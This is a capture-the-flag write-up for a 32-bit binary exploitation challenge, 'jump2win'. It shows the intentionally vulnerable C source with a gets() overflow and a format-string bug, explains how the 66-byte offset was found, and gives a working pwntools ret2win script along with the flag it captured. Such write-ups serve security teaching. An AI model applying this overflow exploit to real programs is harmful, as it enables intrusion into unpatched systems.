AUCHALL - [Pwn] - jump2win
Challenge Description
A leap of faith.
Solution
The first thing to check is the binary's protections (checksec).
Only NX is enabled, so we cannot run shellcode we place on the stack. There is no stack canary, and PIE is disabled, so every function in the binary sits at a fixed address we can jump to.
Looking at the source, vuln() reads input with gets(), which has no length limit, so we have a classic stack buffer overflow. There is also a printf(buffer) format-string bug, but it is not needed here: with a win function already in the binary this is a plain ret2win.
Source Code
#include <stdio.h>
#include <stdlib.h>

/* The "win" function: main never calls it, so the exploit has to jump here. */
void call_my_function(void) {
    FILE *file;
    char line[100];
    file = fopen("/flag", "r");
    if (file == NULL) {
        puts("[FAIL] Contact an admin.\n");
        exit(1);
    }
    while (fgets(line, sizeof(line), file) != NULL) {
        puts(line);
    }
    fclose(file);
}

void vuln() {
    int allowed = 0;
    char buffer[50];
    printf("Hello, my name is Ali, what is yours? ");
    gets(buffer);   /* no length limit: stack buffer overflow */
    printf(buffer); /* :) also a format-string bug, not needed for ret2win */
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    vuln();
}
Offset
To find the offset (the distance from the start of buffer to the saved return address), run the binary in gdb, feed it a cyclic pattern as the name, and look up the 4-byte value that lands in EIP with cyclic_find. The binary is 32-bit, so the return address is 4 bytes.
The offset comes out as 66: more than the 50-byte buffer because the allowed variable, alignment padding and the saved EBP sit between the buffer and the return address.
Solution
A short pwntools script gets this working:
from pwn import *

elf = ELF('./jmp')

# Run locally by default; pass REMOTE=1 on the command line for the server.
if args.REMOTE:
    io = remote('section-b.cy243l.ooguy.com', PORT)  # PORT: the challenge port
else:
    io = process('./jmp')

print(io.recv())  # "Hello, my name is Ali, what is yours? "

# 66 bytes of padding reach the saved return address; overwrite it with the
# address of call_my_function (32-bit binary, hence p32), which prints /flag.
payload = cyclic(66) + p32(elf.sym.call_my_function)
io.sendline(payload)

print(io.recv())  # echo of our input via printf(buffer), then the flag
io.interactive()
Flag
The flag is dynamic (it changes per instance); the one I got was:
CY243L{ret2wins_are_easy_no_0F01Cd9_X6V8_1MZx}
Writeups 2023 © RootxRAN.